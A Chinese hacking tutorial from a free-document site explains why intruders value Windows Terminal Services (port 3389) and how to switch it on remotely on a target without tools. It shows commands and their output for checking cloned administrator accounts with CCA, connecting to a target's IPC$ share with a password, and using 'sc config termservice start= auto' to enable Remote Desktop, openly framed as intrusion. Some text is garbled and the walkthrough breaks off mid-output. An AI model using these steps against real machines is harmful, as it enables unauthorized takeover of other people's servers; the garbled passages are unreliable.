免费文档

3389端口远程终端服务的全攻略

当前版本的程序。软件只能在服务器上安装一次,而不能安装在您单位的每个桌面上,这样可减少单独更新计算机所花费的成本。
远程管理。终端服务提供了对 Windows 2000 Server 的远程管理,为系统管理员提供了从任何客户机通过广域网或拨号连接远程管理其服务器的一种方法

黑客为什么喜欢终端服务:
主要是终端服务有3个特性:
易于使用
可管理性
安全性
这3个


特性决定了它在网络界的地位,它比任何一个木马的动能都强大,因为有了它,你就等于完全控制了对方的机子一样,可以完全在上面完成本机完成的一切入侵任务。(只要你的网速够快)


但是这里还是要不厌其烦的声明一次:3389只是个服务,不是什么漏洞,你扫到了3389端口并不代表你就可以入侵它,只能说明对方开了终端服务。

三,关于开启终端服务
利用工具开3389,我就不想多说了,这样开没多大技术性,这里我主要介绍不用任何工具开3389的两种方法。
1,利用SC开启对方终端服务

首先先辨别对方是不是2000SERVER,可以用小容CCA炊苑降挠没В 绻 蠺sInternetUser这个用户,9成为SERVER,

C:\>cca \\192.168.0.29 dudu dancewithsnow

Check Clone Account, by netXeyes 2002/04/29
Written by netXeyes 2002, dansnow@http://www.mianfeiwendang.com

Connect 192.168.0.29 ....OK
Prepairing ....OK
Processing ....OK
Checking ....

Check Result:

[DuDu] AS SAME AS [administrator]
[Guest] AS SAME AS [administrator]
[IUSR_RONG] AS SAME AS [administrator]
[IWAM_RONG] AS SAME AS [administrator]
[TEST] AS SAME AS [administrator]
[xr] AS SAME AS [administrator]

很明显这个不是SERVER,接着看使例:

C:\>net use \\xxx.xxx.xxx.xxx\ipc$Content$nbsp;"password" /user:"name"

第一步,检查对方是否真的禁用了Terminal server

C:\>sc \\xxx.xxx.xxx.xxx qc termservice
[SC] GetServiceConfig SUCCESS

SERVICE_NAME: termservice
TYPE : 10 WIN32_OWN_PROCESS
START_TYPE : 4 DISABLED
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\WINNT\System32\termsrv.exe
LOAD_ORDER_GROUP :
TAG : 0
DISPLAY_NAME : Terminal Services
DEPENDENCIES :
SERVICE_START_NAME : LocalSystem

仔细看 START_TYPE一项,显示对方该服务的启动模式为“DISABLED”也就是“禁用”。

第二步,更改对方终端服务的启动模式

C:\>sc \\xxx.xxx.xxx.xxx config termservice start= auto

[SC] ChangeServiceConfig SUCCESS

好了,现在我们已经把对方终端服务的启动模式修改成自动了。

第三步,再检查一便对方终端服务的启动模式

C:\>sc \\TEST qc termservice
[SC] GetServiceConfig SUCCESS

SERVICE_NAME: termservice
TYPE : 10 WIN32_OWN_

PROCESS
START_TYPE : 2 AUTO_START
ERROR_CONTROL : 1 NORMAL
BINARY_PATH_NAME : C:\WINNT\System32\termsrv.exe
LOAD_ORDER_GROUP :
TAG : 0

相关文档
热门文档
你可能喜欢
  • xp2003远程桌面连接数
  • 远程抄报
  • 远程协助
  • chapter8远程监护
  • 3389远程连接器
评论